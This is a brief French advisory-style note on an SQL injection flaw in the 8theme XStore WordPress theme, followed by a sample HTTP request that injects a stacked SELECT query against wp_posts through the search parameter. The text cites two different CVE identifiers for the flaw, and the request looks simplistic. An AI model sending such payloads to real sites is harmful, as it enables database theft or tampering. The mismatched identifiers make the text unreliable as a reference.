
(CVE-2024-33559) Le thème XStore pour WordPress est vulnérable à une injection SQL en raison d'un échappement insuffisant du paramètre fourni par l'utilisateur et d'un manque de préparation suffisante sur la requête SQL existante.
La CVE-2024-33551 est une vulnérabilité d'injection SQL découverte dans 8theme XStore, une plateforme e-commerce basée sur WordPress. Cette vulnérabilité permet aux attaquants d'exécuter des commandes SQL malveillantes sur la base de données, ce qui peut entraîner le vol, la suppression ou même la modification des données.
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1